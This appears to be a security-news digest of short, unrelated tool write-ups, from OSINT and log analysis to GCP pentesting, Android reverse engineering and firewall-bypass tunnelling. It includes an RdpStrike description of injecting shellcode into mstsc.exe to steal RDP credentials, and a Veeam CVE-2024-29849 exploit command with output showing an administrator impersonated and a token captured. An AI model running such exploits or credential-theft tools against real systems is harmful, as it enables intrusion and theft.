OSINT-Collector : Harnessing Advanced Frameworks For Domain-Specific Intelligence Gathering

OSINT-Collector is an advanced framework that facilitates the collectionanalysis, and management of OSINT information useful for conducting investigations in specific domains of interest.

Table Of Contents

  • Design and Architecture
  • Requirements
  • Sequence Diagram
    • Interaction Flow
  • Backend
    • Configuration
    • Importing OSINT Ontology
    • Creating Domain Ontology with Wikidata
    • Neo4j Plugins
  • Launcher
  • Frontend
    • Add Tools
  • Usage
    • Run Tools
    • View Results
    • Make Inferences
    • Search Engine
  • Preventing a School Shooting: a DEMO Scenario!

Design And Architecture

In this framework has been used an Ontology approach:

  • The OSINT Ontology describes how data extracted from OSINT sources should be inserted into the database, including their respective properties and relationships.
  • Domain Ontologies describe various domains of interest. These ontologies are utilized to link the extracted data to entities within these domains, enabling deeper inferences.

Using the graphical interface, the user can select an OSINT tool, input required parameters, and initiate execution to perform a specific search.

This execution request is sent via an HTTP request to the Launcher, which then executes the requested tools using the corresponding inputs.

The resulting data are aggregated, filtered and sent via an HTTP request to the backend, which communicates with the database and performs the following operations:

  • Insertion and linking of data based on the schema described by the OSINT Ontology.
  • Analysis of textual documents using NLP techniques provided by cloud services to extract suspicious entities and moderate the text to identify dangerous categories.
  • Linking of entities and categories extracted in the previous phase with the domain ontologies.

The user can visualize the search results through the graphical interface, with the framework highlighting the identified contents during the analysis, emphasizing suspicious entities and categories.

Users can conduct further, more in-depth searches.

Using the OSINT Ontology allows for easily including new OSINT sources to leverage.

Requirements

This project requires the following dependencies to be installed:

  • Docker and Docker Compose
  • Node.js and npm

For more information click here.

GoAccess : A Comprehensive Guide To Real-Time Web Log Analysis And Visualization

GoAccess is an open source real-time web log analyzer and interactive viewer that runs in a terminal on *nix systems or through your browser.

It provides fast and valuable HTTP statistics for system administrators that require a visual server report on the fly. 

Features

GoAccess parses the specified web log file and outputs the data to the X terminal. Features include:

  • Completely Real Time
    All panels and metrics are timed to be updated every 200 ms on the terminal output and every second on the HTML output.
  • Minimal Configuration needed
    You can just run it against your access log file, pick the log format and let GoAccess parse the access log and show you the stats.
  • Track Application Response Time
    Track the time taken to serve the request. Extremely useful if you want to track pages that are slowing down your site.
  • Nearly All Web Log Formats
    GoAccess allows any custom log format string. Predefined options include, Apache, Nginx, Amazon S3, Elastic Load Balancing, CloudFront, etc.
  • Incremental Log Processing
    Need data persistence? GoAccess has the ability to process logs incrementally through the on-disk persistence options.
  • Only one dependency
    GoAccess is written in C. To run it, you only need ncurses as a dependency. That’s it. It even features its own Web Socket server.
  • Visitors
    Determine the amount of hits, visitors, bandwidth, and metrics for slowest running requests by the hour, or date.
  • Metrics per Virtual Host
    Have multiple Virtual Hosts (Server Blocks)? It features a panel that displays which virtual host is consuming most of the web server resources.
  • ASN (Autonomous System Number mapping)
    Great for detecting malicious traffic patterns and block them accordingly.
  • Color Scheme Customizable
    Tailor GoAccess to suit your own color taste/schemes. Either through the terminal, or by simply applying the stylesheet on the HTML output.
  • Support for Large Datasets
    GoAccess features the ability to parse large logs due to its optimized in-memory hash tables. It has very good memory usage and pretty good performance. This storage has support for on-disk persistence as well.
  • Docker Support
    Ability to build GoAccess’ Docker image from upstream. You can still fully configure it, by using Volume mapping and editing goaccess.conf. See Docker section below.

Nearly All Web Log Formats…

GoAccess allows any custom log format string. Predefined options include, but not limited to:

  • Amazon CloudFront (Download Distribution).
  • Amazon Simple Storage Service (S3)
  • AWS Elastic Load Balancing
  • Combined Log Format (XLF/ELF) Apache | Nginx
  • Common Log Format (CLF) Apache
  • Google Cloud Storage.
  • Apache virtual hosts
  • Squid Native Format.
  • W3C format (IIS).
  • Caddy’s JSON Structured format.
  • Traefik’s CLF flavor

Why GoAccess?

GoAccess was designed to be a fast, terminal-based log analyzer. Its core idea is to quickly analyze and view web server statistics in real time without needing to use your browser (great if you want to do a quick analysis of your access log via SSH, or if you simply love working in the terminal).

While the terminal output is the default output, it has the capability to generate a complete, self-contained, real-time HTML report, as well as a JSON, and CSV report.

You can see it more of a monitor command tool than anything else.

For more information click here.

Wstunnel – Revolutionizing Network Access Through Advanced Tunneling Techniques

Most of the time when you are using a public network, you are behind some kind of firewall or proxy. One of their purpose is to constrain you to only use certain kind of protocols and consult only a subset of the web.

Nowadays, the most widespread protocol is http and is de facto allowed by third party equipment.

Wstunnel uses the websocket protocol which is compatible with http in order to bypass firewalls and proxies. Wstunnel allows you to tunnel whatever traffic you want and access whatever resources/site you need.

My inspiration came from this project but as I don’t want to install npm and nodejs to use this tool, I remade it in Haskell Rust and improved it.

What To Expect:

  • Easy to use
  • Good error messages and debug information
  • Static forward and reverse tunneling (TCP, UDP, Unix socket, Stdio)
  • Dynamic tunneling (TCP, UDP Socks5 proxy and Transparent Proxy)
  • Support for http proxy (when behind one)
  • Support of proxy protocol
  • Support for tls/https server with certificates auto-reload (with embedded self-signed certificate, or your own)
  • Support of mTLS with certificates auto-reload – documentation here
  • Support IPv6
  • Support for Websocket and HTTP2 as transport protocol (websocket is more performant)
  • Standalone binaries (so just cp it where you want) here

Note

v7.0.0 is a complete rewrite of wstunnel in Rust and is not compatible with previous version. Previous code in Haskell can be found on branch

What to expect from previous version:

  • More throughput and less jitter due to Haskell GC. Most of you will not care, as it was performant enough already. But you can now saturate a gigabit ethernet card with a single connection
  • Command line is more homogeneous/has better UX. All tunnel can be specified multiple times
  • Tunnel protocol tries to look like normal traffic, to avoid being flagged
  • Support of reverse tunneling
  • New bug, it is a rewrite (╯’□’)╯︵ ┻━┻ ¯\(ツ)
  • Mainly for me to ease the maintenance of the project. I don’t do a lot of haskell nowadays and it was harder for me to keep maintening the project over time, as I get lost in touch of the Haskell ecosystem and new release.
  • Armv7 build (aka raspberry pi), as new version of GHC (Haskell compiler) dropped its support

Command Line

Usage: wstunnel client [OPTIONS] <ws[s]|http[s]://wstunnel.server.com[:port]>

Arguments:
  <ws[s]|http[s]://wstunnel.server.com[:port]>
          Address of the wstunnel server
          You can either use websocket or http2 as transport protocol. Use websocket if you are unsure.
          Example: For websocket with TLS wss://wstunnel.example.com or without ws://wstunnel.example.com
                   For http2 with TLS https://wstunnel.example.com or without http://wstunnel.example.com
          
          *WARNING* HTTP2 as transport protocol is harder to make it works because:
            - If you are behind a (reverse) proxy/CDN they are going to buffer the whole request before forwarding it to the server
              Obviously, this is not going to work for tunneling traffic
            - if you have wstunnel behind a reverse proxy, most of them (i.e: nginx) are going to turn http2 request into http1
              This is not going to work, because http1 does not support streaming naturally
          The only way to make it works with http2 is to have wstunnel directly exposed to the internet without any reverse proxy in front of it

Options:
  -L, --local-to-remote <{tcp,udp,socks5,stdio,unix}://[BIND:]PORT:HOST:PORT>
          Listen on local and forwards traffic from remote. Can be specified multiple times
          examples:
          'tcp://1212:google.com:443'      =>       listen locally on tcp on port 1212 and forward to google.com on port 443
          'tcp://2:n.lan:4?proxy_protocol' =>       listen locally on tcp on port 2 and forward to n.lan on port 4
                                                    Send a proxy protocol header v2 when establishing connection to n.lan
          
          'udp://1212:1.1.1.1:53'          =>       listen locally on udp on port 1212 and forward to cloudflare dns 1.1.1.1 on port 53
          'udp://1212:1.1.1.1:53?timeout_sec=10'    timeout_sec on udp force close the tunnel after 10sec. Set it to 0 to disable the timeout [default: 30]
          
          'socks5://[::1]:1212'            =>       listen locally with socks5 on port 1212 and forward dynamically requested tunnel
          
          'tproxy+tcp://[::1]:1212'        =>       listen locally on tcp on port 1212 as a *transparent proxy* and forward dynamically requested tunnel
          'tproxy+udp://[::1]:1212?timeout_sec=10'  listen locally on udp on port 1212 as a *transparent proxy* and forward dynamically requested tunnel
                                                    linux only and requires sudo/CAP_NET_ADMIN
          
          'stdio://google.com:443'         =>       listen for data from stdio, mainly for `ssh -o ProxyCommand="wstunnel client --log-lvl=off -L stdio://%h:%p ws://localhost:8080" my-server`
          
          'unix:///tmp/wstunnel.sock:g.com:443' =>  listen for data from unix socket of path /tmp/wstunnel.sock and forward to g.com:443

  -R, --remote-to-local <{tcp,udp,socks5,unix}://[BIND:]PORT:HOST:PORT>
          Listen on remote and forwards traffic from local. Can be specified multiple times. Only tcp is supported
          examples:
          'tcp://1212:google.com:443'      =>     listen on server for incoming tcp cnx on port 1212 and forward to google.com on port 443 from local machine
          'udp://1212:1.1.1.1:53'          =>     listen on server for incoming udp on port 1212 and forward to cloudflare dns 1.1.1.1 on port 53 from local machine
          'socks5://[::1]:1212'            =>     listen on server for incoming socks5 request on port 1212 and forward dynamically request from local machine
          'unix://wstunnel.sock:g.com:443' =>     listen on server for incoming data from unix socket of path wstunnel.sock and forward to g.com:443 from local machine

      --no-color <NO_COLOR>
          Disable color output in logs
          
          [env: NO_COLOR=]

      --socket-so-mark <INT>
          (linux only) Mark network packet with SO_MARK sockoption with the specified value.
          You need to use {root, sudo, capabilities} to run wstunnel when using this option

  -c, --connection-min-idle <INT>
          Client will maintain a pool of open connection to the server, in order to speed up the connection process.
          This option set the maximum number of connection that will be kept open.
          This is useful if you plan to create/destroy a lot of tunnel (i.e: with socks5 to navigate with a browser)
          It will avoid the latency of doing tcp + tls handshake with the server
          
          [default: 0]

      --nb-worker-threads <INT>
          *WARNING* The flag does nothing, you need to set the env variable *WARNING*
          Control the number of threads that will be used.
          By default, it is equal the number of cpus
          
          [env: TOKIO_WORKER_THREADS=]

      --log-lvl <LOG_LEVEL>
          Control the log verbosity. i.e: TRACE, DEBUG, INFO, WARN, ERROR, OFF
          for more details: https://docs.rs/tracing-subscriber/latest/tracing_subscriber/filter/struct.EnvFilter.html#example-syntax
          
          [env: RUST_LOG=]
          [default: INFO]

      --tls-sni-override <DOMAIN_NAME>
          Domain name that will be used as SNI during TLS handshake
          Warning: If you are behind a CDN (i.e: Cloudflare) you must set this domain also in the http HOST header.
                   or it will be flagged as fishy and your request rejected

      --tls-sni-disable
          Disable sending SNI during TLS handshake
          Warning: Most reverse proxies rely on it

      --tls-verify-certificate
          Enable TLS certificate verification.
          Disabled by default. The client will happily connect to any server with self-signed certificate.

  -p, --http-proxy <USER:PASS@HOST:PORT>
          If set, will use this http proxy to connect to the server
          
          [env: HTTP_PROXY=]

      --http-proxy-login <LOGIN>
          If set, will use this login to connect to the http proxy. Override the one from --http-proxy
          
          [env: WSTUNNEL_HTTP_PROXY_LOGIN=]

      --http-proxy-password <PASSWORD>
          If set, will use this password to connect to the http proxy. Override the one from --http-proxy
          
          [env: WSTUNNEL_HTTP_PROXY_PASSWORD=]

  -P, --http-upgrade-path-prefix <HTTP_UPGRADE_PATH_PREFIX>
          Use a specific prefix that will show up in the http path during the upgrade request.
          Useful if you need to route requests server side but don't have vhosts
          
          [env: WSTUNNEL_HTTP_UPGRADE_PATH_PREFIX=]
          [default: v1]

      --http-upgrade-credentials <USER[:PASS]>
          Pass authorization header with basic auth credentials during the upgrade request.
          If you need more customization, you can use the http_headers option.

      --websocket-ping-frequency-sec <seconds>
          Frequency at which the client will send websocket ping to the server.
          
          [default: 30]

      --websocket-mask-frame
          Enable the masking of websocket frames. Default is false
          Enable this option only if you use unsecure (non TLS) websocket server, and you see some issues. Otherwise, it is just overhead.

  -H, --http-headers <HEADER_NAME: HEADER_VALUE>
          Send custom headers in the upgrade request
          Can be specified multiple time

      --http-headers-file <FILE_PATH>
          Send custom headers in the upgrade request reading them from a file.
          It overrides http_headers specified from command line.
          File is read everytime and file format must contain lines with `HEADER_NAME: HEADER_VALUE`

      --tls-certificate <FILE_PATH>
          [Optional] Certificate (pem) to present to the server when connecting over TLS (HTTPS).
          Used when the server requires clients to authenticate themselves with a certificate (i.e. mTLS).
          The certificate will be automatically reloaded if it changes

      --tls-private-key <FILE_PATH>
          [Optional] The private key for the corresponding certificate used with mTLS.
          The certificate will be automatically reloaded if it changes



SERVER
Usage: wstunnel server [OPTIONS] <ws[s]://0.0.0.0[:port]>

Arguments:
  <ws[s]://0.0.0.0[:port]>
          Address of the wstunnel server to bind to
          Example: With TLS wss://0.0.0.0:8080 or without ws://[::]:8080
          
          The server is capable of detecting by itself if the request is websocket or http2. So you don't need to specify it.

Options:
      --socket-so-mark <INT>
          (linux only) Mark network packet with SO_MARK sockoption with the specified value.
          You need to use {root, sudo, capabilities} to run wstunnel when using this option

      --websocket-ping-frequency-sec <seconds>
          Frequency at which the server will send websocket ping to client.

      --no-color <NO_COLOR>
          Disable color output in logs
          
          [env: NO_COLOR=]

      --websocket-mask-frame
          Enable the masking of websocket frames. Default is false
          Enable this option only if you use unsecure (non TLS) websocket server, and you see some issues. Otherwise, it is just overhead.

      --nb-worker-threads <INT>
          *WARNING* The flag does nothing, you need to set the env variable *WARNING*
          Control the number of threads that will be used.
          By default, it is equal the number of cpus
          
          [env: TOKIO_WORKER_THREADS=]

      --restrict-to <DEST:PORT>
          Server will only accept connection from the specified tunnel information.
          Can be specified multiple time
          Example: --restrict-to "google.com:443" --restrict-to "localhost:22"

      --dns-resolver <DNS_RESOLVER>
          Dns resolver to use to lookup ips of domain name
          This option is not going to work if you use transparent proxy
          Can be specified multiple time
          Example:
           dns://1.1.1.1 for using udp
           dns+https://1.1.1.1 for using dns over HTTPS
           dns+tls://8.8.8.8 for using dns over TLS
          To use libc resolver, use
          system://0.0.0.0

      --log-lvl <LOG_LEVEL>
          Control the log verbosity. i.e: TRACE, DEBUG, INFO, WARN, ERROR, OFF
          for more details: https://docs.rs/tracing-subscriber/latest/tracing_subscriber/filter/struct.EnvFilter.html#example-syntax
          
          [env: RUST_LOG=]
          [default: INFO]

  -r, --restrict-http-upgrade-path-prefix <RESTRICT_HTTP_UPGRADE_PATH_PREFIX>
          Server will only accept connection from if this specific path prefix is used during websocket upgrade.
          Useful if you specify in the client a custom path prefix, and you want the server to only allow this one.
          The path prefix act as a secret to authenticate clients
          Disabled by default. Accept all path prefix. Can be specified multiple time
          
          [env: WSTUNNEL_RESTRICT_HTTP_UPGRADE_PATH_PREFIX=]

      --restrict-config <RESTRICT_CONFIG>
          Path to the location of the restriction yaml config file.
          Restriction file is automatically reloaded if it changes

      --tls-certificate <FILE_PATH>
          [Optional] Use custom certificate (pem) instead of the default embedded self-signed certificate.
          The certificate will be automatically reloaded if it changes

      --tls-private-key <FILE_PATH>
          [Optional] Use a custom tls key (pem, ec, rsa) that the server will use instead of the default embedded one
          The private key will be automatically reloaded if it changes

      --tls-client-ca-certs <FILE_PATH>
          [Optional] Enables mTLS (client authentication with certificate). Argument must be PEM file
          containing one or more certificates of CA's of which the certificate of clients needs to be signed with.
          The ca will be automatically reloaded if it changes

For more information click here.

GCPwn – A Comprehensive Tool For GCP Security Testing

gcpwn was a tool built by myself while trying to learn GCP and leverages the newer GRPC client libraries created by google.

It consists of numerous enumeration modules I wrote plus exploit modules leveraging research done by others in the space (ex. Rhino Security) along with some existing known standalone tools like GCPBucketBrute in an effort to make the tool a one-stop-shop for GCP testing.

While other exploit scripts are generally one time use, GCPwn stores both data and permissions as you are running through modules organizing the data for you, and re-using it to make your life easier in terms of pentesting/tracking permissions.

Who Is This For?

This tool is mainly for pentesters, those just learning GCP security, and security researchers in general.

  • For pentesters, as illustrated above the tool automates a lot of scripts you would normally run and stores data to make exploit modules trivial to execute.
  • For those just learning GCP security, the tool is setup in such a way that it should be easy to add your own module via a Pull request as you dive into the individual service.
  • For security researchers, the tool allows you to run through a large number of GCP API calls and I document how to proxy the tool in the background through a local tool like Burp Suite.
    • So running enum_all with burp suite logging all the requests will give you visibility into all the different API endpoints across all the different python libraries with one command.
      • That’s the hope at least, I got it partially working with env variables, if someone can finish cracking the code 🙂

Installation Support

I tested GCPwn with the following installation setups. While its python which should theoretically work everywhere, I can’t GURANTEE there are no bugs on windows/etc although happy to fix any that arise:

Supported OS: Kali Linux 6.6.9

Python Version: Python3 3.11.8

Installation

Ideally the tool will be in pip at some point. For now, it requires a git clone and a setup script. Once you start the tool it will ask you to create a workspace (a purely logical attempt at a container, you can pass in whatever name you want) and you should be good to go. setup.sh just installs gcloud at the command line and pip install the requirements.txt if you wanted to do those separately.

# Setup a virtual environment
python3 -m venv ./myenv
source myenv/bin/activate

# Clone the tool locally
git clone https://github.com/NetSPI/gcpwn.git

# Run setup.sh; This will install gcloud CLI tool and pip3 install -r requirements if you want to do those separately
chmod +x setup.sh; ./setup.sh

# Launch the tool after all items installed & create first workspace
python3 main.py
[*] No workspaces were detected.
New workspace name: my_workspace
[*] Workspace 'my_workspace' created.

Welcome to your workspace! Type 'help' or '?' to see available commands.

[*] Listing existing credentials...

Submit the name or index of an existing credential from above, or add NEW credentials via Application Default 
Credentails (adc - google.auth.default()), a file pointing to adc credentials, a standalone OAuth2 Token, 
or Service credentials. See wiki for details on each. To proceed with no credentials just hit ENTER and submit 
an empty string. 
 [1] *adc      <credential_name> [tokeninfo]                    (ex. adc mydefaultcreds [tokeninfo]) 
 [2] *adc-file <credential_name> <filepath> [tokeninfo]         (ex. adc-file mydefaultcreds /tmp/name2.json)
 [3] *oauth2   <credential_name> <token_value> [tokeninfo]      (ex. oauth2 mydefaultcreds ya[TRUNCATED]i3jJK)  
 [4] service   <credential_name> <filepath_to_service_creds>    (ex. service mydefaultcreds /tmp/name2.json)

*To get scope and/or email info for Oauth2 tokens (options 1-3) include a third argument of 
"tokeninfo" to send the tokens to Google's official oauth2 endpoint to get back scope. 
tokeninfo will set the credential name for oauth2, otherwise credential name will be used.
Advised for best results. See https://cloud.google.com/docs/authentication/token-types#access-contents.
Using tokeninfo will add scope/email to your references if not auto-picked up.

Input:  

For more information click here.

Quick Start – Comprehensive Guide To Installing And Configuring Malcolm On Linux Platforms

The files required to build and run Malcolm are available on its [GitHub page]({{ site.github.repository_url }}/tree/{{ site.github.build_revision }}). Malcolm’s source-code is released under the terms of the Apache License, Version 2.0 (see [LICENSE.txt]({{ site.github.repository_url }}/blob/{{ site.github.build_revision }}/LICENSE.txt) and [NOTICE.txt]({{ site.github.repository_url }}/blob/{{ site.github.build_revision }}/NOTICE.txt) for the terms of its release).

Building Malcolm From Scratch

The build.sh script can build Malcolm’s Docker images from scratch. See Building from source for more information.

Initial Configuration

The scripts to control Malcolm require Python 3. The install.py script requires the dotenv, requests and PyYAML modules for Python 3, and will make use of the pythondialog module for user interaction (on Linux) if it is available.

You must run auth_setup prior to pulling Malcolm’s Docker images. You should also ensure your system configuration and Malcolm settings are tuned by running ./scripts/install.py and ./scripts/configure (see Malcolm Configuration).

Pull Malcolm’s Docker Images

Malcolm’s Docker images are periodically built and hosted on GitHub. If you already have Docker and Docker Compose, these prebuilt images can be pulled by navigating into the Malcolm directory (containing the docker-compose.yml file) and running docker compose --profile malcolm pull like this:

$ docker compose --profile malcolm pull
Pulling api               ... done
Pulling arkime            ... done
Pulling dashboards        ... done
Pulling dashboards-helper ... done
Pulling file-monitor      ... done
Pulling filebeat          ... done
Pulling freq              ... done
Pulling htadmin           ... done
Pulling logstash          ... done
Pulling netbox            ... done
Pulling netbox-postgresql ... done
Pulling netbox-redis      ... done
Pulling nginx-proxy       ... done
Pulling opensearch        ... done
Pulling pcap-capture      ... done
Pulling pcap-monitor      ... done
Pulling suricata          ... done
Pulling upload            ... done
Pulling zeek              ... done

You can then observe the images have been retrieved by running docker images:

$ docker images
REPOSITORY                                                     TAG               IMAGE ID       CREATED      SIZE
ghcr.io/idaholab/malcolm/api                                   24.05.0           xxxxxxxxxxxx   3 days ago   158MB
ghcr.io/idaholab/malcolm/arkime                                24.05.0           xxxxxxxxxxxx   3 days ago   816MB
ghcr.io/idaholab/malcolm/dashboards                            24.05.0           xxxxxxxxxxxx   3 days ago   1.02GB
ghcr.io/idaholab/malcolm/dashboards-helper                     24.05.0           xxxxxxxxxxxx   3 days ago   184MB
ghcr.io/idaholab/malcolm/file-monitor                          24.05.0           xxxxxxxxxxxx   3 days ago   588MB
ghcr.io/idaholab/malcolm/file-upload                           24.05.0           xxxxxxxxxxxx   3 days ago   259MB
ghcr.io/idaholab/malcolm/filebeat-oss                          24.05.0           xxxxxxxxxxxx   3 days ago   624MB
ghcr.io/idaholab/malcolm/freq                                  24.05.0           xxxxxxxxxxxx   3 days ago   132MB
ghcr.io/idaholab/malcolm/htadmin                               24.05.0           xxxxxxxxxxxx   3 days ago   242MB
ghcr.io/idaholab/malcolm/logstash-oss                          24.05.0           xxxxxxxxxxxx   3 days ago   1.35GB
ghcr.io/idaholab/malcolm/netbox                                24.05.0           xxxxxxxxxxxx   3 days ago   1.01GB
ghcr.io/idaholab/malcolm/nginx-proxy                           24.05.0           xxxxxxxxxxxx   3 days ago   121MB
ghcr.io/idaholab/malcolm/opensearch                            24.05.0           xxxxxxxxxxxx   3 days ago   1.17GB
ghcr.io/idaholab/malcolm/pcap-capture                          24.05.0           xxxxxxxxxxxx   3 days ago   121MB
ghcr.io/idaholab/malcolm/pcap-monitor                          24.05.0           xxxxxxxxxxxx   3 days ago   213MB
ghcr.io/idaholab/malcolm/postgresql                            24.05.0           xxxxxxxxxxxx   3 days ago   268MB
ghcr.io/idaholab/malcolm/redis                                 24.05.0           xxxxxxxxxxxx   3 days ago   34.2MB
ghcr.io/idaholab/malcolm/suricata                              24.05.0           xxxxxxxxxxxx   3 days ago   278MB
ghcr.io/idaholab/malcolm/zeek                                  24.05.0           xxxxxxxxxxxx   3 days ago   1GB

For more information click here.

Installation – Comprehensive Guide To Using Androguard

The versatile capabilities of Androguard, a powerful tool for reverse engineering Android applications.

This guide provides a step-by-step overview on how to install Androguard using different methods, including direct downloads from PyPI and builds from the latest commits on GitHub.

Once installed, explore its comprehensive command-line interface that offers a range of functionalities from APK analysis to dynamic tracing.

Whether you’re a developer or a security analyst, Androguard equips you with the essential tools to dive deep into Android app structures and behaviors.

You can install Androguard in three different ways:

Getting One Of The released Versions From PyPI

pip install Androguard

or if you want an older version

pip install androguard==3.3.5

Getting A Version With All The Latest Commits

git clone https://github.com/androguard/androguard.git
cd androguard
pip install .

or the same thing using pip and the GitHub URL of the project:

pip install git+https://github.com/androguard/androguard

Androguard Is Now Available To Be Used As A CLI And As A library.

Sessions

All events are saved in the file ‘androguard.db’ which is basically a sqlite db. There are 3 tables:

  • information (related to all APK/DEX/… analyzed during a session)
  • session (unique key to identify a particular session done)
  • pentest (events from frida saved)

Please note that the sessions are work in progress!

CLI

The CLI serves as the primary and easiest way for interacting with Androguard.

Upon installing androguard with any of the methods shown above, the tool should be available in your path as androguard

Usage: androguard [OPTIONS] COMMAND [ARGS]...

  Androguard is a full Python tool to reverse Android Applications.

Options:
  --version           Show the version and exit.
  --verbose, --debug  Print more
  --help              Show this message and exit.

Commands:
  analyze      Open a IPython Shell and start reverse engineering.
  apkid        Return the packageName/versionCode/versionName per APK as...
  arsc         Decode resources.arsc either directly from a given file or...
  axml         Parse the AndroidManifest.xml.
  cg           Create a call graph based on the data of Analysis and...
  decompile    Decompile an APK and create Control Flow Graphs.
  disassemble  Disassemble Dalvik Code with size SIZE starting from an...
  dtrace       Start dynamically an installed APK on the phone and start...
  dump         Start and dump dynamically an installed APK on the phone
  sign         Return the fingerprint(s) of all certificates inside an APK.
  trace        Push an APK on the phone and start to trace all...

For more information click here.

Netis Cloud Probe – Bridging Network Monitoring Gaps ith Advanced Packet Capture Tools

Netis Cloud Probe (Packet Agent, name used before)is an open source project to deal with such situation: it captures packets on Machine A but has to use them on Machine B.

This case is very common when you try to monitor network traffic in the LAN but the infrastructure is incapable, for example

  • There is neither TAP nor SPAN device in a physical environment.
  • The Virtual Switch Flow Table does not support SPAN function in a virtualization environment.

Also, this project aims at developing a suite of low cost but high efficiency tools to survive the challenge above.

  • pktminerg is the very first one, which makes you easily capture packets from an NIC interface, encapsulate them with GRE and send them to a remote machine for monitoring and analysis.
  • pcapcompare is a utility for comparing 2 different pcap files.
  • gredump is used for capturing GRE packet with filter, and save them to pcap file.
  • gredemo is a demo app which is used to read packet from a pcap file and send them all to remote NIC. This can be only used when built from source code.
  • probeDaemon is a new added module from v0.7.0, which is responsible for the management of the pktminerg process.
    • It can pull and kill pktminerg process and set the parameters of pktminerg in the command line. This module should work with CPM (Cloud Probe Manager),which provides a user interface to set the strategies of pktminerg and can also display the statistis reported from pktminerg in graphs.
      • You can contact Netis for the further support of CPM, or you can also develop your CPM. Currently, no probeDaemon for Win, which will be released later.

Getting Started

Installation

CentOS 7/8 and RedHat 7

  1. Download and install the RPM package. Find the latest package from Releases Page.
wget https://github.com/Netis/cloud-probe/releases/download/v0.7.0/netis-cloud-probe-0.7.0.x86_64_centos.rpm
rpm -ivh netis-cloud-probe-0.7.0.x86_64_centos.rpm

For more information click here.

RdpStrike – Harnessing PIC And Hardware Breakpoints For Credential Extraction

The RdpStrike is basically a mini project I built to dive deep into Positional Independent Code (PIC) referring to a blog post written by C5pider, chained with RdpThief tool created by 0x09AL. The project aims to extract clear text passwords from mstsc.exe, and the shellcode uses Hardware Breakpoint to hook APIs. It is a complete positional independent code, and when the shellcode injects into the mstsc.exe process, it is going to put Hardware Breakpoint onto three different APIs (SspiPrepareForCredReadCryptProtectMemory, and CredIsMarshaledCredentialW), ultimately capturing any clear-text credentials and then saving them to a file.

An aggressor script makes sure to monitor for new processes; if the process mstsc is spawned, it injects the shellcode into it.

When the aggressor script is loaded on CobaltStrike, three new commands will be available:

rdpstrike_enable – Enables the heartbeat check of new mstsc.exe processes and injects into them.
rdpstrike_disable – Disables the heartbeat check of new mstsc.exe but is not going to remove the hooks and free the shellcode.
rdpstrike_dump – Reads the file and prints the extracted credentials if any.

IOCs

  • It uses the cobaltstrike inbuilt shellcode injector. Easily detected by kernel callback function PsSetCreateThreadNotifyRoutine/PsSetCreateThreadNotifyRoutineEx
  • The hooks are placed using GetThreadContext & SetThreadContext the calls are executed from an un-backed memory.
  • The shellcode writes a file in TEMP (C:\Windows\Temp) with a name as {7C6A0555-C7A9-4E26-9744-5C2526EA3039}.dat
  • There is also a call to LoadLibraryA loading dpapi.dll which is again from un-backed memory.
  • NtQuerySystemInformation syscall is used to to get a list of threads in the process.

CVE-2024-29849 : The Veeam Backup Enterprise Manager Authentication Bypass

According to Veeam official advisory, all the versions BEFORE Veeam Backup Enterprise Manager 12.1.2.172 are vulnerable

Usage

First, you need to have the right setup for a local HTTPS setup, use the following commands

openssl req -new -x509 -keyout key.pem -out server.pem -days 365 -nodes
python CVE-2024-29849.py --target https://192.168.253.180:9398/ --callback-server 192.168.253.1:443

 _______ _     _ _______ _______  _____  __   _ _____ __   _  ______   _______ _______ _______ _______
 |______ |     | |  |  | |  |  | |     | | \  |   |   | \  | |  ____      |    |______ |_____| |  |  |
 ______| |_____| |  |  | |  |  | |_____| |  \_| __|__ |  \_| |_____| .    |    |______ |     | |  |  |

        (*) Veeam Backup Enterprise Manager Authentication Bypass (CVE-2024-29849)

        (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)

        (*) Technical details: https://summoning.team/blog/veeam-cve-2024-29849-authentication-bypass/


(*) Target https://192.168.253.180:9398 is reachable and seems to be a Veeam Backup Enterprise Manager
(*) Fetching certificate for 192.168.253.180
(*) Common Name (CN) extracted from certificate: batserver.evilcorp.local
(*) Assumed domain name: evilcorp.local
(?) Is the assumed domain name correct(Y/n)?y
(*) Target domain name is: evilcorp.local
(*) Starting callback server

(^_^) Prepare for the Pwnage (^_^)

(*) Callback server listening on https://192.168.253.1:443
192.168.253.1 - - [10/Jun/2024 07:20:13] "GET / HTTP/1.1" 200 -
(*) Callback server 192.168.253.1:443 is reachable
(*) Triggering malicious SAML assertion to https://192.168.253.180:9398
(*) Impersonating user: administrator@evilcorp.local
192.168.253.180 - - [10/Jun/2024 07:20:13] "POST /ims/STSService HTTP/1.1" 200 -
(+) SAML Auth request received, serving malicious RequestSecurityTokenResponseType

(+) Exploit was Successful, authenticated as administrator@evilcorp.local
(*) Got token: MmIzOGVjMzQtZGIxZC00MWE3LTgxNjMtNjA2MTE4ODY5ZDkw
(*) Starting post-exploitation phase
(*) Retrieving the list of file servers
{'FileServers': [{'ServerType': 'SmbServer', 'HierarchyObjRef': 'urn:NasBackup:FileServer:9dee6394-bf7a-4dc6-a9a5-4faf2e22551d.0d4a7862-82cb-4c93-a53b-e500d6cb9e35', 'SmbServerOptions': {'Path': '\\\\192.168.253.134\\corporate-docs', 'CredentialsId': None}, 'NfsServerOptions': None, 'FileServerOptions': None, 'ProcessingOptions': {'ServerUid': 'urn:veeam:FileServer:0d4a7862-82cb-4c93-a53b-e500d6cb9e35', 'CacheRepositoryUid': 'urn:veeam:Repository:88788f9e-d8f5-4eb4-bc4f-9b3f5403bcec'}, 'NASServerAdvancedOptions': {'ProcessingMode': 'Direct', 'StorageSnapshotPath': None}, 'Name': '\\\\192.168.253.134\\corporate-docs', 'UID': 'urn:veeam:FileServer:0d4a7862-82cb-4c93-a53b-e500d6cb9e35', 'Links': [{'Rel': 'Up', 'Href': 'https://192.168.253.180:9398/api/backupServers/e59b6cc4-444e-4a2d-a986-3d4d0b8791de', 'Name': '192.168.253.134', 'Type': 'BackupServerReference'}, {'Rel': 'Alternate', 'Href': 'https://192.168.253.180:9398/api/nas/fileServers/0d4a7862-82cb-4c93-a53b-e500d6cb9e35', 'Name': '\\\\192.168.253.134\\corporate-docs', 'Type': 'FileServerReference'}], 'Href': 'https://192.168.253.180:9398/api/nas/fileServers/0d4a7862-82cb-4c93-a53b-e500d6cb9e35?format=Entity', 'Type': 'FileServer'}]}

CVE-2024-26229 : Address Validation Flaws In IOCTL With METHOD_NEITHER

delve into CVE-2024-26229, a critical security vulnerability identified within the csc.sys driver, pivotal in handling I/O control codes.

This issue is catalogued under CWE-781, indicating a severe oversight in address validation mechanisms when utilizing METHOD_NEITHER I/O Control Codes.

Such vulnerabilities pose significant risks as they could allow attackers to execute arbitrary code within the kernel, leading to potential system takeovers.

